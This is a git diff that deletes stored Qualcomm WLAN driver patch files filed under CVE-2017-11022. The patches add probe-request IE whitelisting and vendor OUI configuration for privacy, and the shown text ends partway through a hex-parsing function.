-+            pMsg->oui_field_offset = (tANI_U16)(sizeof( tSirSmeScanReq ) -
-+                                   sizeof( pMsg->channelList.channelNumber ) +
-+                                   (sizeof( pMsg->channelList.channelNumber ) *
-+                                   pScanReq->ChannelInfo.numOfChannels )) +
-+                                   pScanReq->uIEFieldLen;
-+
-+            if (pScanReq->num_vendor_oui != 0)
-+            {
-+                vos_mem_copy((tANI_U8 *)pMsg + pMsg->oui_field_offset,
-+                             (uint8_t*)(pScanReq->voui),
-+                             pMsg->oui_field_len);
-+            }
-+
-         }while(0);
-         smsLog(pMac, LOG1, FL("domainIdCurrent %s (%d) scanType %s (%d)"
-                               "bssType %s (%d), requestType %s(%d)"
-@@ -6479,6 +6502,7 @@ eHalStatus csrScanCopyRequest(tpAniSirGlobal pMac, tCsrScanRequest *pDstReq, tCs
-             pDstReq->pIEField = NULL;
-             pDstReq->ChannelInfo.ChannelList = NULL;
-             pDstReq->SSIDs.SSIDList = NULL;
-+            pDstReq->voui = NULL;
- 
-             if(pSrcReq->uIEFieldLen == 0)
-             {
-@@ -6721,6 +6745,35 @@ eHalStatus csrScanCopyRequest(tpAniSirGlobal pMac, tCsrScanRequest *pDstReq, tCs
-             pDstReq->p2pSearch = pSrcReq->p2pSearch;
-             pDstReq->skipDfsChnlInP2pSearch = pSrcReq->skipDfsChnlInP2pSearch;
- 
-+            if (pSrcReq->num_vendor_oui == 0)
-+            {
-+                pDstReq->num_vendor_oui = 0;
-+                pDstReq->voui = NULL;
-+            }
-+            else
-+            {
-+                pDstReq->voui = vos_mem_malloc(pSrcReq->num_vendor_oui *
-+                                         sizeof(*pDstReq->voui));
-+                if (NULL == pDstReq->voui)
-+                        status = eHAL_STATUS_FAILURE;
-+                else
-+                        status = eHAL_STATUS_SUCCESS;
-+
-+                if (HAL_STATUS_SUCCESS(status))
-+                {
-+                    pDstReq->num_vendor_oui = pSrcReq->num_vendor_oui;
-+                    vos_mem_copy(pDstReq->voui,
-+                                 pSrcReq->voui,
-+                                 pSrcReq->num_vendor_oui *
-+                                 sizeof(*pDstReq->voui));
-+                }
-+                else
-+                {
-+                    pDstReq->num_vendor_oui = 0;
-+                    smsLog(pMac, LOGE, FL("No memory for voui"));
-+                    break;
-+                }
-+            }
-         }
-     }while(0);
- 
-@@ -6755,6 +6808,13 @@ eHalStatus csrScanFreeRequest(tpAniSirGlobal pMac, tCsrScanRequest *pReq)
-     }
-     pReq->SSIDs.numOfSSIDs = 0;
- 
-+    if(pReq->voui)
-+    {
-+        vos_mem_free(pReq->voui);
-+        pReq->voui = NULL;
-+    }
-+    pReq->num_vendor_oui = 0;
-+
-     return eHAL_STATUS_SUCCESS;
- }
- 
-diff --git a/CORE/SME/src/pmc/pmcApi.c b/CORE/SME/src/pmc/pmcApi.c
-index c1f7653..45313c1 100644
---- a/CORE/SME/src/pmc/pmcApi.c
-+++ b/CORE/SME/src/pmc/pmcApi.c
-@@ -2867,14 +2867,17 @@ eHalStatus pmcSetPreferredNetworkList
-         return eHAL_STATUS_FAILURE;
-     }
- 
--    pRequestBuf = vos_mem_malloc(sizeof(tSirPNOScanReq));
-+    pRequestBuf = vos_mem_malloc(sizeof(tSirPNOScanReq) +
-+                  (pRequest->num_vendor_oui) *
-+                  (sizeof(struct vendor_oui)));
-     if (NULL == pRequestBuf)
-     {
-         VOS_TRACE(VOS_MODULE_ID_SME, VOS_TRACE_LEVEL_ERROR, "%s: Not able to allocate memory for PNO request", __func__);
-         return eHAL_STATUS_FAILED_ALLOC;
-     }
- 
--    vos_mem_copy(pRequestBuf, pRequest, sizeof(tSirPNOScanReq));
-+    vos_mem_copy(pRequestBuf, pRequest, sizeof(tSirPNOScanReq) +
-+                 (pRequest->num_vendor_oui) * (sizeof(struct vendor_oui)));
- 
-     /*Must translate the mode first*/
-     ucDot11Mode = (tANI_U8) csrTranslateToWNICfgDot11Mode(pMac,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11022/qcacld-3.0/0002.patch
deleted file mode 100644
index c599bbff..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11022/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,1297 +0,0 @@
-From f41e3dbc92d448d3d56cae5517e41a4bafafdf3f Mon Sep 17 00:00:00 2001
-From: Rajeev Kumar Sirasanagandla <rsirasan@codeaurora.org>
-Date: Tue, 3 Jan 2017 00:22:10 +0530
-Subject: qcacld-3.0: Add support to include selective scan IEs only
-
-qcacld-2.0 to qcacld-3.0 propagation
-
-Add support to include only selective IEs in probe requests in
-order to improve user's privacy.
-
-Change-Id: Ib874af7ec2f5453282ffe0e8fc2e50934460b745
-CRs-Fixed: 1086582
----
- core/hdd/inc/wlan_hdd_cfg.h                        | 313 +++++++++++++++++++++
- core/hdd/inc/wlan_hdd_main.h                       |   5 +
- core/hdd/src/wlan_hdd_cfg.c                        | 283 ++++++++++++++++++-
- core/hdd/src/wlan_hdd_cfg80211.c                   |  14 +-
- core/hdd/src/wlan_hdd_main.c                       |  18 ++
- core/hdd/src/wlan_hdd_power.c                      |   2 +
- core/hdd/src/wlan_hdd_scan.c                       |  76 ++++-
- core/hdd/src/wlan_hdd_scan.h                       |  21 +-
- core/mac/inc/sir_api.h                             |  35 ++-
- core/mac/src/pe/lim/lim_process_sme_req_messages.c |  24 +-
- core/sme/inc/csr_api.h                             |   6 +
- core/sme/src/common/sme_power_save.c               |   9 +-
- core/sme/src/csr/csr_api_scan.c                    |  53 +++-
- core/wma/src/wma_scan_roam.c                       |  36 +++
- 14 files changed, 880 insertions(+), 15 deletions(-)
-
-diff --git a/core/hdd/inc/wlan_hdd_cfg.h b/core/hdd/inc/wlan_hdd_cfg.h
-index 92c8669..d2cb3be 100644
---- a/core/hdd/inc/wlan_hdd_cfg.h
-+++ b/core/hdd/inc/wlan_hdd_cfg.h
-@@ -61,6 +61,8 @@
- 
- /* Number of items that can be configured */
- #define MAX_CFG_INI_ITEMS   1024
-+#define MAX_PRB_REQ_VENDOR_OUI_INI_LEN 160
-+#define VENDOR_SPECIFIC_IE_BITMAP 0x20000000
- 
- /* Defines for all of the things we read from the configuration (registry). */
- 
-@@ -10049,6 +10051,261 @@ enum dot11p_mode {
- #define CFG_ARP_AC_CATEGORY_MAX            (3)
- #define CFG_ARP_AC_CATEGORY_DEFAULT        (3)
- 
-+
-+/*
-+ * <ini>
-+ * g_enable_probereq_whitelist_ies - Enable IE white listing
-+ * @Min: 0
-+ * @Max: 1
-+ * @Default: 0
-+ *
-+ * This ini is used to enable/disable probe request IE white listing feature.
-+ * Values 0 and 1 are used to disable and enable respectively, by default this
-+ * feature is disabled.
-+ *
-+ * Related: None
-+ *
-+ * Supported Feature: Probe request IE whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_WHITELIST_NAME    "g_enable_probereq_whitelist_ies"
-+#define CFG_PRB_REQ_IE_WHITELIST_MIN     (0)
-+#define CFG_PRB_REQ_IE_WHITELIST_MAX     (1)
-+#define CFG_PRB_REQ_IE_WHITELIST_DEFAULT (0)
-+
-+/*
-+ * For IE white listing in Probe Req, following ini parameters from
-+ * g_probe_req_ie_bitmap_0 to g_probe_req_ie_bitmap_7 are used. User needs to
-+ * input this values in hexa decimal format, when bit is set in bitmap,
-+ * corresponding IE needs to be included in probe request.
-+ *
-+ * Example:
-+ * ========
-+ * If IE 221 needs to be in the probe request, set the corresponding bit
-+ * as follows:
-+ * a= IE/32 = 221/32 = 6 = g_probe_req_ie_bitmap_6
-+ * b = IE modulo 32 = 29,
-+ * means set the bth bit in g_probe_req_ie_bitmap_a,
-+ * therefore set 29th bit in g_probe_req_ie_bitmap_6,
-+ * as a result, g_probe_req_ie_bitmap_6=20000000
-+ *
-+ * Note: For IE 221, its mandatory to set the gProbeReqOUIs.
-+ */
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_0 - Used to set the bitmap of IEs from 0 to 31
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 0 to 31 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP0_NAME    "g_probe_req_ie_bitmap_0"
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_1 - Used to set the bitmap of IEs from 32 to 63
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 32 to 63 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP1_NAME    "g_probe_req_ie_bitmap_1"
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_2 - Used to set the bitmap of IEs from 64 to 95
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 64 to 95 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP2_NAME    "g_probe_req_ie_bitmap_2"
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_3 - Used to set the bitmap of IEs from 96 to 127
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 96 to 127 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP3_NAME    "g_probe_req_ie_bitmap_3"
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_4 - Used to set the bitmap of IEs from 128 to 159
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 128 to 159 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP4_NAME    "g_probe_req_ie_bitmap_4"
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_5 - Used to set the bitmap of IEs from 160 to 191
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 160 to 191 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP5_NAME    "g_probe_req_ie_bitmap_5"
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_6 - Used to set the bitmap of IEs from 192 to 223
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 192 to 223 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP6_NAME    "g_probe_req_ie_bitmap_6"
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT (0x00000000)
-+
-+/*
-+ * <ini>
-+ * g_probe_req_ie_bitmap_7 - Used to set the bitmap of IEs from 224 to 255
-+ * @Min: 0x00000000
-+ * @Max: 0xFFFFFFFF
-+ * @Default: 0x00000000
-+ *
-+ * This ini is used to include the IEs from 224 to 255 in probe request,
-+ * when corresponding bit is set.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PRB_REQ_IE_BIT_MAP7_NAME    "g_probe_req_ie_bitmap_7"
-+#define CFG_PRB_REQ_IE_BIT_MAP7_MIN     (0x00000000)
-+#define CFG_PRB_REQ_IE_BIT_MAP7_MAX     (0xFFFFFFFF)
-+#define CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT (0x00000000)
-+
-+/*
-+ * For vendor specific IE, Probe Req OUI types and sub types which are
-+ * to be white listed are specified in gProbeReqOUIs in the following
-+ * example format - gProbeReqOUIs=AABBCCDD EEFF1122
-+ */
-+
-+/*
-+ * <ini>
-+ * gProbeReqOUIs - Used to specify vendor specific OUIs
-+ * @Default: Empty string
-+ *
-+ * This ini is used to include the specified OUIs in vendor specific IE
-+ * of probe request.
-+ *
-+ * Related: Need to enable g_enable_probereq_whitelist_ies and
-+ * vendor specific IE should be set in g_probe_req_ie_bitmap_6.
-+ *
-+ * Supported Feature: Probe request ie whitelisting
-+ *
-+ * Usage: Internal/External
-+ *
-+ * </ini>
-+ */
-+#define CFG_PROBE_REQ_OUI_NAME    "gProbeReqOUIs"
-+#define CFG_PROBE_REQ_OUI_DEFAULT ""
-+
-+
- /*---------------------------------------------------------------------------
-    Type declarations
-    -------------------------------------------------------------------------*/
-@@ -10779,6 +11036,20 @@ struct hdd_config {
- 
- 	uint8_t packet_filters_bitmap;
- 	uint32_t                    arp_ac_category;
-+
-+	bool probe_req_ie_whitelist;
-+	/* probe request bit map ies */
-+	uint32_t probe_req_ie_bitmap_0;
-+	uint32_t probe_req_ie_bitmap_1;
-+	uint32_t probe_req_ie_bitmap_2;
-+	uint32_t probe_req_ie_bitmap_3;
-+	uint32_t probe_req_ie_bitmap_4;
-+	uint32_t probe_req_ie_bitmap_5;
-+	uint32_t probe_req_ie_bitmap_6;
-+	uint32_t probe_req_ie_bitmap_7;
-+
-+	/* Probe Request multiple vendor OUIs */
-+	uint8_t probe_req_ouis[MAX_PRB_REQ_VENDOR_OUI_INI_LEN];
- };
- 
- #define VAR_OFFSET(_Struct, _Var) (offsetof(_Struct, _Var))
-@@ -10891,6 +11162,48 @@ static __inline unsigned long util_min(unsigned long a, unsigned long b)
- 
- /* Function declarations and documenation */
- QDF_STATUS hdd_parse_config_ini(hdd_context_t *pHddCtx);
-+
-+/**
-+ * hdd_validate_prb_req_ie_bitmap - validates user input for ie bit map
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function checks whether user has entered valid probe request
-+ * ie bitmap and also verifies vendor ouis if vendor specific ie is set
-+ *
-+ * Return: status of verification
-+ *         true - valid input
-+ *         false - invalid input
-+ */
-+bool hdd_validate_prb_req_ie_bitmap(hdd_context_t *hdd_ctx);
-+
-+/**
-+ * hdd_parse_probe_req_ouis - form ouis from ini gProbeReqOUIs
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function parses the ini string gProbeReqOUIs which needs be to in the
-+ * following format:
-+ * "<8 characters of [0-9] or [A-F]>space<8 characters from [0-9] etc.,"
-+ * example: "AABBCCDD 1122EEFF"
-+ * and the logic counts the number of OUIS and allocates the memory
-+ * for every valid OUI and is stored in hdd_context_t
-+ *
-+ * Return: status of parsing
-+ *         0 - success
-+ *         negative value - failure
-+ */
-+int hdd_parse_probe_req_ouis(hdd_context_t *hdd_ctx);
-+
-+/**
-+ * hdd_free_probe_req_ouis - de-allocates the probe req ouis
-+ * @hdd_ctx: the pointer to hdd context
-+ *
-+ * This function de-alloactes the probe req ouis which are
-+ * allocated while parsing of ini string gProbeReqOUIs
-+ *
-+ * Return: None
-+ */
-+void hdd_free_probe_req_ouis(hdd_context_t *hdd_ctx);
-+
- QDF_STATUS hdd_update_mac_config(hdd_context_t *pHddCtx);
- QDF_STATUS hdd_set_sme_config(hdd_context_t *pHddCtx);
- QDF_STATUS hdd_set_sme_chan_list(hdd_context_t *hdd_ctx);
-diff --git a/core/hdd/inc/wlan_hdd_main.h b/core/hdd/inc/wlan_hdd_main.h
-index d0d0531..38522ea 100644
---- a/core/hdd/inc/wlan_hdd_main.h
-+++ b/core/hdd/inc/wlan_hdd_main.h
-@@ -285,6 +285,8 @@ typedef enum {
- 	eHDD_SAP_EAPOL_IN_PROGRESS,
- } scan_reject_states;
- 
-+#define MAX_PROBE_REQ_OUIS 16
-+
- /*
-  * Generic asynchronous request/response support
-  *
-@@ -1658,6 +1660,9 @@ struct hdd_context_s {
- 	bool rcpi_enabled;
- 	bool imps_enabled;
- 	int user_configured_pkt_filter_rules;
-+
-+	uint32_t no_of_probe_req_ouis;
-+	struct vendor_oui *probe_req_voui;
- };
- 
- /*---------------------------------------------------------------------------
-diff --git a/core/hdd/src/wlan_hdd_cfg.c b/core/hdd/src/wlan_hdd_cfg.c
-index 0ab8662..72a1647 100644
---- a/core/hdd/src/wlan_hdd_cfg.c
-+++ b/core/hdd/src/wlan_hdd_cfg.c
-@@ -4408,6 +4408,74 @@ REG_TABLE_ENTRY g_registry_table[] = {
- 		CFG_ARP_AC_CATEGORY_DEFAULT,
- 		CFG_ARP_AC_CATEGORY_MIN,
- 		CFG_ARP_AC_CATEGORY_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_WHITELIST_NAME, WLAN_PARAM_Integer,
-+		     struct hdd_config, probe_req_ie_whitelist,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_WHITELIST_DEFAULT,
-+		     CFG_PRB_REQ_IE_WHITELIST_MIN,
-+		     CFG_PRB_REQ_IE_WHITELIST_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP0_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_0,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP0_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP0_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP0_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP1_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_1,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP1_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP1_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP1_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP2_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_2,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP2_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP2_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP2_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP3_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_3,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP3_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP3_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP3_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP4_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_4,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP4_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP4_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP4_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP5_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_5,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP5_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP5_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP5_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP6_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_6,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP6_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP6_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP6_MAX),
-+
-+	REG_VARIABLE(CFG_PRB_REQ_IE_BIT_MAP7_NAME, WLAN_PARAM_HexInteger,
-+		     struct hdd_config, probe_req_ie_bitmap_7,
-+		     VAR_FLAGS_OPTIONAL | VAR_FLAGS_RANGE_CHECK_ASSUME_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP7_DEFAULT,
-+		     CFG_PRB_REQ_IE_BIT_MAP7_MIN,
-+		     CFG_PRB_REQ_IE_BIT_MAP7_MAX),
-+
-+	REG_VARIABLE_STRING(CFG_PROBE_REQ_OUI_NAME, WLAN_PARAM_String,
-+			    struct hdd_config, probe_req_ouis,
-+			    VAR_FLAGS_OPTIONAL,
-+			    (void *)CFG_PROBE_REQ_OUI_DEFAULT),
- };
- 
- /**
-@@ -5898,8 +5966,38 @@ void hdd_cfg_print(hdd_context_t *pHddCtx)
- 	hdd_debug("Name = [%s] Value = [%d]",
- 		CFG_ARP_AC_CATEGORY,
- 		pHddCtx->config->arp_ac_category);
--}
- 
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_WHITELIST_NAME,
-+		 pHddCtx->config->probe_req_ie_whitelist);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP0_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_0);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP1_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_1);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP2_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_2);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP3_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_3);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP4_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_4);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP5_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_5);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP6_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_6);
-+	hdd_info("Name = [%s] Value = [%x] ",
-+		 CFG_PRB_REQ_IE_BIT_MAP7_NAME,
-+		 pHddCtx->config->probe_req_ie_bitmap_7);
-+	hdd_info("Name = [%s] Value =[%s]",
-+		 CFG_PROBE_REQ_OUI_NAME,
-+		 pHddCtx->config->probe_req_ouis);
-+}
- 
- /**
-  * hdd_update_mac_config() - update MAC address from cfg file
-@@ -6160,8 +6258,7 @@ QDF_STATUS hdd_parse_config_ini(hdd_context_t *pHddCtx)
- 					buffer = i_trim(buffer);
- 					if (strlen(buffer) > 0) {
- 						value = buffer;
--						while (!i_isspace(*buffer)
--						       && *buffer != '\0')
-+						while (*buffer != '\0')
- 							buffer++;
- 						*buffer = '\0';
- 						cfgIniTable[i].name = name;
-@@ -7682,3 +7779,183 @@ QDF_STATUS hdd_update_nss(hdd_context_t *hdd_ctx, uint8_t nss)
- 
- 	return (status == false) ? QDF_STATUS_E_FAILURE : QDF_STATUS_SUCCESS;
- }
-+
-+bool hdd_validate_prb_req_ie_bitmap(hdd_context_t *hdd_ctx)
-+{
-+	if (!(hdd_ctx->config->probe_req_ie_bitmap_0 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_1 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_2 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_3 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_4 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_5 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_6 ||
-+	    hdd_ctx->config->probe_req_ie_bitmap_7))
-+		return false;
-+
-+	/*
-+	 * check whether vendor oui IE is set and OUIs are present, each OUI
-+	 * is entered in the form of string of 8 characters from ini, therefore,
-+	 * for atleast one OUI, minimum length is 8 and hence this string length
-+	 * is checked for minimum of 8
-+	 */
-+	if ((hdd_ctx->config->probe_req_ie_bitmap_6 &
-+	    VENDOR_SPECIFIC_IE_BITMAP) &&
-+	    (strlen(hdd_ctx->config->probe_req_ouis) < 8))
-+		return false;
-+
-+	/* check whether vendor oui IE is not set but OUIs are present */
-+	if (!(hdd_ctx->config->probe_req_ie_bitmap_6 &
-+	    VENDOR_SPECIFIC_IE_BITMAP) &&
-+	    (strlen(hdd_ctx->config->probe_req_ouis) > 0))
-+		return false;
-+
-+	return true;
-+}
-+
-+/**
-+ * probe_req_voui_convert_to_hex - converts str of 8 chars into two hex values
-+ * @temp: string to be converted
-+ * @voui: contains the type and subtype values
-+ *
-+ * This function converts the string length of 8 characters into two
-+ * hexa-decimal values, oui_type and oui_subtype, where oui_type is the
-+ * hexa decimal value converted from first 6 characters and oui_subtype is
-+ * hexa decimal value converted from last 2 characters.
-+ * strings which doesn't match with the specified pattern are ignored.
-+ *
-+ * Return: status of conversion
-+ *         true - if conversion is successful
-+ *         false - if conversion is failed
-+ */
-+static bool hdd_probe_req_voui_convert_to_hex(uint8_t *temp,
-+					      struct vendor_oui *voui)
-+{
-+	uint32_t hex_value[4] = {0};
-+	uint32_t i = 0;
-+	uint32_t indx = 0;
-+
-+	memset(voui, 0x00, sizeof(*voui));
-+
-+	/* convert string to hex */
-+	for (i = 0; i < 8; i++) {
-+		if (temp[i] >= '0' && temp[i] <= '9') {
-+			hex_value[indx] = (temp[i] - '0') << 4;
-+		} else if (temp[i] >= 'A' && temp[i] <= 'F') {
-+			hex_value[indx] = (temp[i] - 'A') + 0xA;
-+			hex_value[indx] = hex_value[indx] << 4;
-+		} else {
-+			/* invalid character in oui */
-+			return false;
-+		}
-+
-+		if (temp[i + 1] >= '0' && temp[i + 1] <= '9') {
-+			hex_value[indx] |= (temp[i + 1] - '0');
-+			i = i + 1;
-+			indx = indx + 1;
-+		} else if (temp[i + 1] >= 'A' && temp[i + 1] <= 'F') {
